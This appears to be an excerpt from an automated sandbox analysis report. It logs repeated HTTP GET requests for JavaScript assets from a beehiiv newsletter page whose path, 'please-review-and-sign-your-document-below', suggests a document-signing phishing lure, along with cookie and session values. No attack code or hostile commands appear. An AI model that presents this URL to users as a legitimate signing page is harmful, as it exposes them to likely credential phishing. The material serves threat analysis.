Source: global trafficHTTP traffic detected: GET /assets/description-BklOXbF-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/LoginWithPasswordAction-TVLpJaLq.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/Image-ycA_AFLr.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/use-root-containers-DmyWFwuo.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/dialog-CtpHvvfD.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-CJHGmWl4.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/use-tree-walker-Inv4mdsP.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useIsLoggedIn-BbU3-q43.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-EzvqLY92.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/XMarkIcon-BIfmjQfr.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-COqk5b7U.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DTtuIjz-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/Input-snMSpc3o.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DWIcfCyK.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /settings?session_id=5014ff864e2c4e055ad43236486b600cbc96bac6 HTTP/1.1Host: syndication.twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/index-BxYGUTX4.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/PoweredByBeehiiv-BmLCj73J.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/RedirectToHiddenInput-mUb4yii7.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/description-BklOXbF-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/LoginWithPasswordAction-TVLpJaLq.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/Image-ycA_AFLr.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/dialog-CtpHvvfD.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/CreateAction-Dl0JjCOR.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/popover-CV1J-FFp.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DIU-Hrs1.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useSetLastViewedResource-BelRoKi6.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DcpNk-OI.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/XMarkIcon-BIfmjQfr.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/ChevronDownIcon-CCywpT3m.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-COqk5b7U.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DTtuIjz-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-DWIcfCyK.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
